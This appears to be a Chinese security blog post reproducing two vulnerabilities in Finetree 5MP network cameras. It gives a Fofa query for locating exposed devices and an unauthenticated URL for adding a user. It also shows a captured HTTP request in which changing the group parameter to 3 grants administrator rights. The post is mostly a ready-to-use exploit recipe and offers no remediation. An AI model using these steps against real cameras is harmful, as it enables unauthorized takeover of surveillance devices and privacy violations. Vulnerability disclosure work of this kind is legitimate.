Finetree-5MP-摄像机双漏洞复现

  • A+
所属分类:安全文章

Fofa搜索:https://fofa.so/


app="Finetree-5MP-Network-Camera"


Finetree-5MP-摄像机双漏洞复现


漏洞复现

未授权访问添加 [未登录状态的]

exp:http://ip:port/quicksetup/user_pop.php?method=add

添加回出现报错,不用管,直接登录即可


Finetree-5MP-摄像机双漏洞复现

另一个漏洞:

已知低权限更改高权限,添加用户,用burp抓包看看什么情况

添加一个测试账号,test,得到的请求包是这样:

 1 POST /quicksetup/user_update.php HTTP/1.1 2 Host: x.x.x,x:8086 3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 4 Accept: */* 5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6 Accept-Encoding: gzip, deflate 7 Content-Type: application/x-www-form-urlencoded 8 Content-Length: 52 9 Origin: http://x.x.x.x:808610 Connection: close11 Referer: http://x.x.x.x:8086/quicksetup/user_pop.php?method=add12 Cookie: PHPSESSID=g02lv1iu0aod4ao75ioil2m0m313 14 method=add&user=test&pwd=123456&group=1&ptz_enable=0

以上ip经过处理

group是组,1代表guest,2是operator,3是administrator,截断修改group=可以修改为管理员权限。

Finetree-5MP-摄像机双漏洞复现

Finetree-5MP-摄像机双漏洞复现


本文始发于微信公众号(暗影安全):Finetree-5MP-摄像机双漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: